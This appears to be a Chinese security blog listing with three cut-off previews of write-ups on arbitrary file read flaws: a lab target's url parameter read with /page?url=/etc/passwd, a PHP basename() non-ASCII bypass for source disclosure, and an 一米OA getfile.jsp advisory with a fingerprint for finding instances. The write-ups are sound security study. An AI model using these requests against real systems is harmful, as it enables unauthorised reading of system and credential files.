一、漏洞点发现进入靶场,发现存在一个表单,可以向page页面用GET请求方式发送一个名为url的参数,当你输入一个URL时会给你返回一个后缀为.jpg但内容为你的目标URL文件。<!doctype html> <html> <head> <title>test</title> </head> <body> <form action="/page" method="get"> <input type="text" name="url"/> </form> </body> </html>经过测试,url参数存在任意文件读取漏洞:访问/page?url=/etc/passwd:HTTP/1.1 200 OK Server: openresty Date: Wed, 12 Jun 2024 06:32:57 GMT Con
index.phpinclude 'tm.php'; // Next step in tm.php if (preg_match('/tm\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("no way!"); } if (isset($_GET['source'])) { $path = basename($_SERVER['PHP_SELF']); if (!preg_match('/tm.php$/', $path) && !preg_match('/index.php$/', $path)) { exit("nonono!"); } highlight_file($path); exit(); }basename函数漏洞:在使用默认语言环境设置时,basename() 会删除文件名开头的非 ASCII 字符。例如:$path1="/www/%ffindex.php"; echo basename
漏洞描述一米OA getfile.jsp文件过滤不足且对权限验证不严格,导致任意文件读取漏洞。漏洞影响一米OA网络测绘app="一米OA"漏洞复现出现漏洞的文件如下:<%@ page contentType="text/html;charset=utf-8" %> <%@page import="cn.js.fan.util.*" %> <%@page import="cn.js.fan.web.Global" %> <%@page import="com.redmoon.oa.*" %> <%@page import="java.io.*" %> <jsp:useBean id="fchar" scope="page" class="cn.js.fan.util.StrUtil"/> <jsp:useBean id="f
Equinox
一个乐于分享的网安人